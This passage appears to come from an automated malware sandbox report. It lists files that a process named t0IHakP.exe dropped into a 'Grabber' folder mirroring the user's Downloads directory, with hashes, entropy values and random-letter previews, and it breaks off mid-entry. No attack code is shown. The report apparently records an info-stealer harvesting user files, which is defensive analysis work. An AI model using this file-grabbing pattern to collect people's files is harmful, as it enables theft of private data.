PVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\IVHSHTCODI.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\JDSOXXXWOA.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697659282858546
Encrypted:	false
SSDEEP:	24:PZQpY9CEILBiF4Pm3eR+sEnNgL6nCW2Y+uaPg9N/v6Q:xz9CEILGCCeR+sCaLKT2TuamVD
MD5:	36FF3A29DF5FCCA14A0FF7431E1C2E9B
SHA1:	C9688881A1A294728BA4A8B5FB2F38DA3267AC07
SHA-256:	DE686B6E22DC89FE172C29EA9221415221F214CD895763E255FCF5AAEE38E240
SHA-512:	0861C1F602EEC19A2F41C7F9C56352DB9497F628B3F2ECDDC7B98B5E24559D7012EF45D020786DF67FAC85F485CD2A25941EA894681A6B42D9A6ABFC4B9C95CB
Malicious:	false
Preview:	JDSOXXXWOAHUSVGOCZZUNHSINJUSJQGESAHVTHZWADMWVUHKNKEYECCVOPSPXQMMRTJEEDOFPBKWQBWEDEAWUPPRVCRNLZAVBLNCWBMIYVZJGZUPTHGFKCXKWLTQCZQPVRXBIAVKYLTFXPKNHVWYMOUBOZQSCFNHTCTVVDHABNRSEIRXPGUVHPJRXHDVQOUZEXTQARFRICYOSUBNKEVGHZNSQHPCONVPIVIZKOKBTGHMBCORJUHRCVHLLLCXNSHKGVDKTVXUYWRZZWPFJNOSQIOTEJVJWRKTCWXZJKSTIXEMRZVNIBTWRTYOGNKENDSOGEUFCZHZYBWICCKXGXWKGNSNLJGLSDGHUWALHDWVZRYHCQNPZEFTPXYOSUVIOMEZVNNCZURCXELWTINXUKBZTOMRGIVZNMMHUVBKLGFRKYWMYSEIOMJGQGNNWXSIPRRGCYJLZPQIGVVRGGIWSBFJWNMIHYBTTNYTHUBYODAVVOMBAPZKYFUHGDXYMJBKYURCWOJWNGJWFWIHOYYRBYQMJCLIOPHRDDBMRPUMPYCXXGTMYQECUGCCJYKESOBMCTEIFVVICNMXJDGTYESOWLJHWFEFKDEKUKKLKISTLOTKRYLMZDQERBBALFYUEZMKPDBKAGGQHIKIECDSAGIELZVVCNSIPWEXNQLIRNXWGBYHVMXQAPKLQOTFHYKEIQETFBRRPRYPISBRTYMGEIXTCRSLOVMLKWKAUALATKYYNFIRASLERFJZYJWJDEUVJNQIHTSIBZHXWHXSSQNFOSWYDTKNMLOFKDOECKGKVBAKPFZRKCBMCDGLAABGWBCFMKGJUBIHBWBARNAHHTZKNZZPZAUEJJQIUMHCASBJGILUQKBBCSIQMEOUZCFGTXLDYKUHXCHFZHMBCWHRIOVRKXVQUVLMUKYQZQFGGFYGKWBAJJKGZINILPXFMXXMEKMODDVNAMUZNNTJCUURPRTMODGGFBSVRAIMVMRSDSSUQTQRZMVO

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\MNULNCRIYC.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704010251295094
Encrypted:	false
SSDEEP:	24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
MD5:	DF05C5F93419C56BFE3A84BDCC929382
SHA1:	36AABBCD46C0F368E18FA602E486816D2578F48E
SHA-256:	F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
SHA-512:	EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
Malicious:	false
Preview:	MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\MQAWXUYAIK.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694269844633945
Encrypted:	false
SSDEEP:	24:8fZFmL9j6Vqvtvrd45sdmW5rRO2KEceUJEcnD1:8RFmL9wqY5qmW5VvcpJEq
MD5:	5E40B4BAF83E9A23A02D6AB379018ADE
SHA1:	47E1914E79AF5D1C90B201FA9A2470A6DDE0D2D0
SHA-256:	E4A221B66518E711FA910625864F36100572A341B05960B3A01889E6393860AF
SHA-512:	50B4FC17B8E6A3D6F2AE7E79BC928ECF02344807B7C0103D91C9C9B01846D3026F377511B8792658587CED392F303F3B325DACD669554055A3C4E778E64A5CA9
Malicious:	false
Preview:	MQAWXUYAIKJZDQIPIEWMLSKXQDXCSIBTOUXCXZAQEYMFIPUKEWDRKYXMBFAEAIEBYLJHANJDICKVRWRYTJZOWEFFJPSSDNBTMTPIVXSVKHYSQUVOKIIKOHZRTBEATVKDWNNQBMYUGKPMRHQBAPGBOTHRORULCQYAEBJYXMZFZXEDLVUTMXEOPNUTQDPFDWWNOPYMFDCDNUQUQLYMWMKOJZMRIYBCAFJAEFUVTOUFBQBRUBWQVGDWPIKRITDALHWQSAPYVARQGQLYXLMNTQSLSPAUIWZRRROVEGNTPLNQITTJYFKNXCKERAVXLSGHLBRKTFPMXSSIBZDONXSKHXZFWONPIPTFGNRIYRMYPZXLVXEJJMAHKCIYWPFDAHGCVFRHUEIHZKBVMRMLFSKMOMDMMQZJJAOFNHFAMIBCLCLZHQCIKLOBZLNSVBVCHDOYIHMAWWJNQHZDGKVCOCIRQOYTUFEWAGZWBPNLJFWAKYETACSEZLMIQNOAAWSGVNBZZZMSSEFVSETBVTSMTSAJHDYWLIBJPQUHPXWOPSVWQVVSLPTYOWJGWLXRJOMQMBZSMWLZZDUJIUHYZLUNSOMJMWEUBWYSZMXVDNUGSZBSFDACOIFWETJRIXVPDMSVMTKEKNHJFFXCTPPDKYDXOUOGJAFSXVENTIMFLXNKBWSOIJAZLZTXZGBBMUATMNGOCOLHIAOOTBENXJLNEBPUYZAWEWHZCOBEUXLNOCBFMFNLCFQRYSEURUEVQSEGVPCVNXYOUEBPWYJVBOVZHHSIVQELASLMFLMIGPFTSWZUYAGUCKFCQXXUWMMESTICTHONLUYSPUWOTQKWRRQMUHGZGAAEZOPOKQULFWRPEFDYEONLKPEMDUKCRINZIRUSKDDNYBNBYIIEFYAXNFVFGHEJTHFTUPICAWBETIIANYRONFSQFBHEGJISEQSPFKPRSEZHTQOXRPUKTEUQJYBYNQULHXLSRXNENUVTORORBUHFHDFSRJFI

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\MQAWXUYAIK.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694269844633945
Encrypted:	false
SSDEEP:	24:8fZFmL9j6Vqvtvrd45sdmW5rRO2KEceUJEcnD1:8RFmL9wqY5qmW5VvcpJEq
MD5:	5E40B4BAF83E9A23A02D6AB379018ADE
SHA1:	47E1914E79AF5D1C90B201FA9A2470A6DDE0D2D0
SHA-256:	E4A221B66518E711FA910625864F36100572A341B05960B3A01889E6393860AF
SHA-512:	50B4FC17B8E6A3D6F2AE7E79BC928ECF02344807B7C0103D91C9C9B01846D3026F377511B8792658587CED392F303F3B325DACD669554055A3C4E778E64A5CA9
Malicious:	false
Preview:	MQAWXUYAIKJZDQIPIEWMLSKXQDXCSIBTOUXCXZAQEYMFIPUKEWDRKYXMBFAEAIEBYLJHANJDICKVRWRYTJZOWEFFJPSSDNBTMTPIVXSVKHYSQUVOKIIKOHZRTBEATVKDWNNQBMYUGKPMRHQBAPGBOTHRORULCQYAEBJYXMZFZXEDLVUTMXEOPNUTQDPFDWWNOPYMFDCDNUQUQLYMWMKOJZMRIYBCAFJAEFUVTOUFBQBRUBWQVGDWPIKRITDALHWQSAPYVARQGQLYXLMNTQSLSPAUIWZRRROVEGNTPLNQITTJYFKNXCKERAVXLSGHLBRKTFPMXSSIBZDONXSKHXZFWONPIPTFGNRIYRMYPZXLVXEJJMAHKCIYWPFDAHGCVFRHUEIHZKBVMRMLFSKMOMDMMQZJJAOFNHFAMIBCLCLZHQCIKLOBZLNSVBVCHDOYIHMAWWJNQHZDGKVCOCIRQOYTUFEWAGZWBPNLJFWAKYETACSEZLMIQNOAAWSGVNBZZZMSSEFVSETBVTSMTSAJHDYWLIBJPQUHPXWOPSVWQVVSLPTYOWJGWLXRJOMQMBZSMWLZZDUJIUHYZLUNSOMJMWEUBWYSZMXVDNUGSZBSFDACOIFWETJRIXVPDMSVMTKEKNHJFFXCTPPDKYDXOUOGJAFSXVENTIMFLXNKBWSOIJAZLZTXZGBBMUATMNGOCOLHIAOOTBENXJLNEBPUYZAWEWHZCOBEUXLNOCBFMFNLCFQRYSEURUEVQSEGVPCVNXYOUEBPWYJVBOVZHHSIVQELASLMFLMIGPFTSWZUYAGUCKFCQXXUWMMESTICTHONLUYSPUWOTQKWRRQMUHGZGAAEZOPOKQULFWRPEFDYEONLKPEMDUKCRINZIRUSKDDNYBNBYIIEFYAXNFVFGHEJTHFTUPICAWBETIIANYRONFSQFBHEGJISEQSPFKPRSEZHTQOXRPUKTEUQJYBYNQULHXLSRXNENUVTORORBUHFHDFSRJFI

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NHPKIZUUSG.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.70435191336402
Encrypted:	false
SSDEEP:	24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
MD5:	8C1F71001ABC7FCE68B3F15299553CE7
SHA1:	382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256:	DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512:	8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious:	false
Preview:	NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\QVTVNIBKSD.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695938097013837
Encrypted:	false
SSDEEP:	24:z3kwMX3+NBj4ilMczAMBVgs3WrV8bfMbETQzpns7vh2HCpPQ:bkww3UGiJyGWr3RMvh2HC9Q
MD5:	DC3E834A02B2C81DF0167ACE639BA00F
SHA1:	32859A24EE65CBB3BD804D02639FCC4745C1CBC9
SHA-256:	0034D483C5EB801444D442E100E6B97859FB3752243C3323578F94083F469A29
SHA-512:	CA0BEDA568B13F4522ABFCBD8E73CD96AEEF991C8896E5C9F03D999722498840CFF29265340F8D86267E8E134085300FF8D42EC5E4741229332DEAD4B30E6D0F
Malicious:	false
Preview:	QVTVNIBKSDCTAQBGAOXCDNDJJSYXWJGWLNQZGTIRDPOXBJKWLQKQGHTGEEYZCSQXRIHLQYWVXDHEUMWEKWFGJLMYICQYBHNEZJWDJOGRRNRTOYBVHVOADCWLJBCJDEJQGWHIISDSHGZRWITARTFGZLYVQWZDXCBALJESXBFEMTGTIZQWIKXFTDQGTAMDONWUIJUYOKJXLUTMOCIHGFKUVWTZWGGDCWXLKJNCFYDCGKWQMLFWZQSHHWIEETWTGXVBHMSPQQUETSKWPAJFMRFRCHDNYKBAAHPLMJRBBAJTVLLAUUCLJYJMJLBKQGNTWGMPYQTUPYRFGMYPSFAZKFDAZPZSDSLLFCSCKJNYWUFBZSQQHSKWDGIBILREFDZJQVIODCTVEDOBTVFRFOHJOUFGKJWSBYWFYBYTUGQGTLYPZCUIXPOJLCNPDOVBXWCGCWSAJJFYOSWSVKPATDKQJRADERJVQVTQESFPSXRVBVEDLVTQYWXVFAKVPURCBYBIAPAQUFQNNEYDRUYBOOCMWAVFRHNFPGDIUCRWCXKMXPIRSBECJROTFLGGLOLFKFRGHTSAIKSQPSZXJDXWBHZHVBFILAACTJHJEQBYDONPYTGLNXEZPFCIDHTTHGIOFCTFHRHIJGRCZPVJAOXIBAJIEMVNELYPQKBHQECWJYTAPCZMZNVFUTOKDAKOXRQKSDSHHXCNPTOQACAKMZSIGEKSTZYQWWAIYNMYZGDCJITHDWZHQWHGDAHXUUSQNHSEWLINMAVJEJLBWIZQNZHARGRNBGZEQKQKZKRPFIWNXAVGMLKQJEJDYBDRSHJBULSDTLIKLIFONGYGERWNAHSKLLHMDBCSSWVOEIGUACWQMNZYBQMRIYIQZQOYRZUOCZWOMBFRIJMVRKAWJHTMEMGVQYWBBMYZGCFTJKRLDPFOIYFDWQUEGJXKLKIPLVLNTFZCDKJMEKYNPPGPMXAGDHXGEVWCGIHPFBAPAKCGGKURXQFPUIQV

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\QVTVNIBKSD.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695938097013837
Encrypted:	false
SSDEEP:	24:z3kwMX3+NBj4ilMczAMBVgs3WrV8bfMbETQzpns7vh2HCpPQ:bkww3UGiJyGWr3RMvh2HC9Q
MD5:	DC3E834A02B2C81DF0167ACE639BA00F
SHA1:	32859A24EE65CBB3BD804D02639FCC4745C1CBC9
SHA-256:	0034D483C5EB801444D442E100E6B97859FB3752243C3323578F94083F469A29
SHA-512:	CA0BEDA568B13F4522ABFCBD8E73CD96AEEF991C8896E5C9F03D999722498840CFF29265340F8D86267E8E134085300FF8D42EC5E4741229332DEAD4B30E6D0F
Malicious:	false
Preview:	QVTVNIBKSDCTAQBGAOXCDNDJJSYXWJGWLNQZGTIRDPOXBJKWLQKQGHTGEEYZCSQXRIHLQYWVXDHEUMWEKWFGJLMYICQYBHNEZJWDJOGRRNRTOYBVHVOADCWLJBCJDEJQGWHIISDSHGZRWITARTFGZLYVQWZDXCBALJESXBFEMTGTIZQWIKXFTDQGTAMDONWUIJUYOKJXLUTMOCIHGFKUVWTZWGGDCWXLKJNCFYDCGKWQMLFWZQSHHWIEETWTGXVBHMSPQQUETSKWPAJFMRFRCHDNYKBAAHPLMJRBBAJTVLLAUUCLJYJMJLBKQGNTWGMPYQTUPYRFGMYPSFAZKFDAZPZSDSLLFCSCKJNYWUFBZSQQHSKWDGIBILREFDZJQVIODCTVEDOBTVFRFOHJOUFGKJWSBYWFYBYTUGQGTLYPZCUIXPOJLCNPDOVBXWCGCWSAJJFYOSWSVKPATDKQJRADERJVQVTQESFPSXRVBVEDLVTQYWXVFAKVPURCBYBIAPAQUFQNNEYDRUYBOOCMWAVFRHNFPGDIUCRWCXKMXPIRSBECJROTFLGGLOLFKFRGHTSAIKSQPSZXJDXWBHZHVBFILAACTJHJEQBYDONPYTGLNXEZPFCIDHTTHGIOFCTFHRHIJGRCZPVJAOXIBAJIEMVNELYPQKBHQECWJYTAPCZMZNVFUTOKDAKOXRQKSDSHHXCNPTOQACAKMZSIGEKSTZYQWWAIYNMYZGDCJITHDWZHQWHGDAHXUUSQNHSEWLINMAVJEJLBWIZQNZHARGRNBGZEQKQKZKRPFIWNXAVGMLKQJEJDYBDRSHJBULSDTLIKLIFONGYGERWNAHSKLLHMDBCSSWVOEIGUACWQMNZYBQMRIYIQZQOYRZUOCZWOMBFRIJMVRKAWJHTMEMGVQYWBBMYZGCFTJKRLDPFOIYFDWQUEGJXKLKIPLVLNTFZCDKJMEKYNPPGPMXAGDHXGEVWCGIHPFBAPAKCGGKURXQFPUIQV

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\TQDGENUHWP.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\TTCBKWZYOC.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695977454005895
Encrypted:	false
SSDEEP:	24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
MD5:	E0510B4427516C1D89AAD3659D680C3D
SHA1:	1992D34F6239D80EB43BA39F3222BF0785E5D1F4
SHA-256:	556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
SHA-512:	35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
Malicious:	false
Preview:	TTCBKWZYOCCZBQCNYNNHXDSUERYXFEQHAUPIPNXOJQUXOZUDZEESDNCWHKQKNDQEYQACGNCNEFJMPDQMTDJPVAEXHHOLCNYTGMJTCVIZRGZKUZAERPNBENDVAICXLLOLWSIEGMSOEYEIDITHTRHSYYBWCBGPBZQXLYXBONVSVHSPKATRJUTIDHHHEWUAPCUXVYKWDFZLJYPWDNHQQXDDTWGQTEITGNUSHUFDEKVXMDOCYWEDDXBIFFPUULVKKNZYXAWHAGTUWPXRWSZRERALKIOBMKWSCSDSTMSQDLNMFPLUOAYUREBXICBNWWZYLJESRGANWCSMIZSLZVXYJTVFMIAKQZGHQEHOJNMLWHGSJYIBNSENALZOLRFLSQDCESQDSWEENRDLRNAFBRWHQROVDJKSJYRUAEAUHKYFMNTTDVOAGXTQQBYBDWSLMUXLJPZIDYAQCVQSGWFERMOEEFHPZYPJLENLUNZDHRSMRZOQNAHMCELDIYOVIKYOGXSSTFKWXDNSJGHNTYJKHFDJRAPKRESQVWZSOVMVHWYUUTUTFHVIEEAJDKECWXBEPNEBJDJGQAKLKIFWVTFCSQJEQQWEZAAEMTKTRFKJHVCMNUEIUYFUJNEPLTNBFNHMJZWFTXXNGAINRCKZQCBHNNGXETNSEMBCQLYZYFSVGAIEZXYSKPOLBNTAPFYTMYNIMCZXQJRBOFEHSZEICWGOGLTRINBITAMJGQEWIBXYHZVOSHMRHTIQZVQIDGRVKRGFJMSPQFABQRKGFILZUCAATIAKKCHSPEJWYJMANQFJPEQKGZTIZMTAUNTSDOXPEWOYUIPDMYGGMKHEAQDMKRKFZTSQLBNRGRUGHNILPIUZEKJSVPCMPFTMLUVIXQACJDBCPRGCSQCZAKBCFXGQSAIAKPMNXEUWBMREPVHWIPXGNLGHEWWLCXYFMSRGLLZCLMZCBNWZILRHRHVYKJTMMBSIYLVPVJRQPZZTQANLXKYMFTAVKNBL

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\TTCBKWZYOC.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
